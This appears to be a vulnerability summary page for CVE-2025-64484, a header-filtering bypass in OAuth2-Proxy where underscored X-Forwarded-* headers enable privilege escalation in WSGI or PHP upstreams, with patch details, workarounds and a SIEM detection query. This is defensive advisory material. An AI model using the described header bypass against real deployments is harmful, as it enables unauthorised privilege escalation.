CVE-2025-64484
📋 TL;DR
This vulnerability allows authenticated users to bypass OAuth2-Proxy's header filtering by using underscores instead of dashes in X-Forwarded-* headers. This can lead to privilege escalation in upstream applications that normalize underscores to dashes. Only deployments with OAuth2-Proxy in front of applications using WSGI-based frameworks or PHP are affected.
💻 Affected Systems
- oauth2-proxy
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Attackers gain administrative privileges in upstream applications, potentially leading to complete system compromise.
Likely Case
Privilege escalation allowing access to restricted functionality or data in the upstream application.
If Mitigated
No impact if upstream applications don't normalize underscores to dashes or have additional security controls.
🎯 Exploit Status
Exploitation requires authenticated access and knowledge of the upstream application's header processing behavior.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 7.13.0
Vendor Advisory: https://github.com/oauth2-proxy/oauth2-proxy/security/advisories/GHSA-vjrc-mh2v-45x6
Restart Required: Yes
Instructions:
1. Update OAuth2-Proxy to version 7.13.0 or later. 2. Restart the OAuth2-Proxy service. 3. Verify the new version is running.
🔧 Temporary Workarounds
Configure upstream applications to not normalize underscores
allModify upstream applications (Django, Flask, FastAPI, PHP) to treat underscores and hyphens in headers differently.
🧯 If You Can't Patch
- Implement additional header validation in upstream applications to reject or sanitize X-Forwarded-* headers with underscores.
- Deploy a WAF or additional reverse proxy layer that strips X-Forwarded-* headers with underscores before they reach OAuth2-Proxy.
🔍 How to Verify
Check if Vulnerable:
Check OAuth2-Proxy version and verify if upstream applications normalize underscores to dashes in HTTP headers.Check Version:
oauth2-proxy --versionVerify Fix Applied:
Confirm OAuth2-Proxy version is 7.13.0 or later and test that X-Forwarded-* headers with underscores are properly stripped.📡 Detection & Monitoring
Log Indicators:
- Unusual X-Forwarded-* headers with underscores in application logs
- Privilege escalation attempts in upstream application logs
Network Indicators:
- HTTP requests containing X_Forwarded_* headers (with underscores) passing through OAuth2-Proxy
SIEM Query:
source="oauth2-proxy" AND (http_header="X_Forwarded_*" OR http_header="*_Forwarded_*")🔗 References
- https://datatracker.ietf.org/doc/html/rfc2616#section-4.2
- https://datatracker.ietf.org/doc/html/rfc822#section-3.2
- https://github.com/oauth2-proxy/oauth2-proxy/security/advisories/GHSA-vjrc-mh2v-45x6
- https://github.security.telekom.com/2020/05/smuggling-http-headers-through-reverse-proxies.html
- https://www.uptimia.com/questions/why-are-http-headers-with-underscores-dropped-by-nginx
